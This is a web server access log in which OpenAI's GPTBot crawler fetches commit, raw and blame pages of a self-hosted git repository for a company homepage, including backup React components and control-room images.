+[17/Feb/2026:14:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" +[17/Feb/2026:14:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" +[17/Feb/2026:14:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" +[17/Feb/2026:14:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" +[17/Feb/2026:14:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:14:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:14:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10841] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:14:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" +[17/Feb/2026:14:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 7269827] [Gzip 12.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" +[17/Feb/2026:14:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699382] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498799] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508436] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692347] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429929] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641754] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" +[17/Feb/2026:14:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" +[17/Feb/2026:14:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 52988] [Gzip 10.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:14:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr 